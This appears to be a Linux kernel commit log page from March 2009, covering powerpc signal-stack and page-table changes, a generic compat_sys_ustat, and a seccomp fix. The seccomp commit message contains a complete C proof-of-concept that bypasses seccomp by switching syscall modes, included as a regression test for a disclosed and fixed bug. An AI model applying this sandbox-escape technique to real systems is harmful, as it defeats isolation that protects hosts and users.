1. 01 4月, 2009 1 次提交
  2. 30 3月, 2009 1 次提交
  3. 28 3月, 2009 1 次提交
    • C
      generic compat_sys_ustat · 2b1c6bd7
      Christoph Hellwig 提交于
      Due to a different size of ino_t ustat needs a compat handler, but
      currently only x86 and mips provide one.  Add a generic compat_sys_ustat
      and switch all architectures over to it.  Instead of doing various
      user copy hacks compat_sys_ustat just reimplements sys_ustat as
      it's trivial.  This was suggested by Arnd Bergmann.
      
      Found by Eric Sandeen when running xfstests/017 on ppc64, which causes
      stack smashing warnings on RHEL/Fedora due to the too large amount of
      data writen by the syscall.
      Signed-off-by: NChristoph Hellwig <hch@lst.de>
      Signed-off-by: NAl Viro <viro@zeniv.linux.org.uk>
      2b1c6bd7
  4. 27 3月, 2009 1 次提交
    • J
      powerpc: Sanitize stack pointer in signal handling code · efbda860
      Josh Boyer 提交于
      On powerpc64 machines running 32-bit userspace, we can get garbage bits in the
      stack pointer passed into the kernel.  Most places handle this correctly, but
      the signal handling code uses the passed value directly for allocating signal
      stack frames.
      
      This fixes the issue by introducing a get_clean_sp function that returns a
      sanitized stack pointer.  For 32-bit tasks on a 64-bit kernel, the stack
      pointer is masked correctly.  In all other cases, the stack pointer is simply
      returned.
      
      Additionally, we pass an 'is_32' parameter to get_sigframe now in order to
      get the properly sanitized stack.  The callers are know to be 32 or 64-bit
      statically.
      Signed-off-by: NJosh Boyer <jwboyer@linux.vnet.ibm.com>
      Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
      efbda860
  5. 24 3月, 2009 22 次提交
  6. 20 3月, 2009 2 次提交
    • B
      powerpc/mm: Unify PTE_RPN_SHIFT and _PAGE_CHG_MASK definitions · a7d2dac8
      Benjamin Herrenschmidt 提交于
      This updates the 32-bit headers to use the same definitions for the RPN
      shift inside the PTE as 64-bit, and thus updates _PAGE_CHG_MASK to
      become identical.
      
      This does introduce a runtime visible difference, which is that now,
      _PAGE_HASHPTE will be part of _PAGE_CHG_MASK and thus preserved. However
      this should have no practical effect as it should have been preserved in
      the first place and we got away with not having it there due to our
      PTE access functions preserving it anyway.
      Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
      a7d2dac8
    • B
      powerpc/mm: Split the various pgtable-* headers based on MMU type · c605782b
      Benjamin Herrenschmidt 提交于
      This patch moves the definition of the PTE format for each MMU type
      to separate files instead of all in one file. This improves overall
      maintainability and will make it easier to add new types.
      
      On 64-bit, additionally, I've separated the headers relative to the
      format of the page table tree (3 vs. 4 levels for 64K vs 4K pages)
      from the headers specific to the PTE format for hash based processors,
      this will make it easier to add support for Book3 "E" 64-bit
      implementations.
      
      There are still some type-related ifdef's in the generic headers,
      we might remove them in the long run, but this patch shouldn't result
      in any code change, -hopefully- just definitions being moved around.
      Signed-off-by: NBenjamin Herrenschmidt <benh@kernel.crashing.org>
      c605782b
  7. 17 3月, 2009 1 次提交
  8. 11 3月, 2009 7 次提交
  9. 09 3月, 2009 1 次提交
  10. 03 3月, 2009 1 次提交
    • R
      x86-64: seccomp: fix 32/64 syscall hole · 5b101740
      Roland McGrath 提交于
      On x86-64, a 32-bit process (TIF_IA32) can switch to 64-bit mode with
      ljmp, and then use the "syscall" instruction to make a 64-bit system
      call.  A 64-bit process make a 32-bit system call with int $0x80.
      
      In both these cases under CONFIG_SECCOMP=y, secure_computing() will use
      the wrong system call number table.  The fix is simple: test TS_COMPAT
      instead of TIF_IA32.  Here is an example exploit:
      
      	/* test case for seccomp circumvention on x86-64
      
      	   There are two failure modes: compile with -m64 or compile with -m32.
      
      	   The -m64 case is the worst one, because it does "chmod 777 ." (could
      	   be any chmod call).  The -m32 case demonstrates it was able to do
      	   stat(), which can glean information but not harm anything directly.
      
      	   A buggy kernel will let the test do something, print, and exit 1; a
      	   fixed kernel will make it exit with SIGKILL before it does anything.
      	*/
      
      	#define _GNU_SOURCE
      	#include <assert.h>
      	#include <inttypes.h>
      	#include <stdio.h>
      	#include <linux/prctl.h>
      	#include <sys/stat.h>
      	#include <unistd.h>
      	#include <asm/unistd.h>
      
      	int
      	main (int argc, char **argv)
      	{
      	  char buf[100];
      	  static const char dot[] = ".";
      	  long ret;
      	  unsigned st[24];
      
      	  if (prctl (PR_SET_SECCOMP, 1, 0, 0, 0) != 0)
      	    perror ("prctl(PR_SET_SECCOMP) -- not compiled into kernel?");
      
      	#ifdef __x86_64__
      	  assert ((uintptr_t) dot < (1UL << 32));
      	  asm ("int $0x80 # %0 <- %1(%2 %3)"
      	       : "=a" (ret) : "0" (15), "b" (dot), "c" (0777));
      	  ret = snprintf (buf, sizeof buf,
      			  "result %ld (check mode on .!)\n", ret);
      	#elif defined __i386__
      	  asm (".code32\n"
      	       "pushl %%cs\n"
      	       "pushl $2f\n"
      	       "ljmpl $0x33, $1f\n"
      	       ".code64\n"
      	       "1: syscall # %0 <- %1(%2 %3)\n"
      	       "lretl\n"
      	       ".code32\n"
      	       "2:"
      	       : "=a" (ret) : "0" (4), "D" (dot), "S" (&st));
      	  if (ret == 0)
      	    ret = snprintf (buf, sizeof buf,
      			    "stat . -> st_uid=%u\n", st[7]);
      	  else
      	    ret = snprintf (buf, sizeof buf, "result %ld\n", ret);
      	#else
      	# error "not this one"
      	#endif
      
      	  write (1, buf, ret);
      
      	  syscall (__NR_exit, 1);
      	  return 2;
      	}
      Signed-off-by: NRoland McGrath <roland@redhat.com>
      [ I don't know if anybody actually uses seccomp, but it's enabled in
        at least both Fedora and SuSE kernels, so maybe somebody is. - Linus ]
      Signed-off-by: NLinus Torvalds <torvalds@linux-foundation.org>
      5b101740
  11. 23 2月, 2009 2 次提交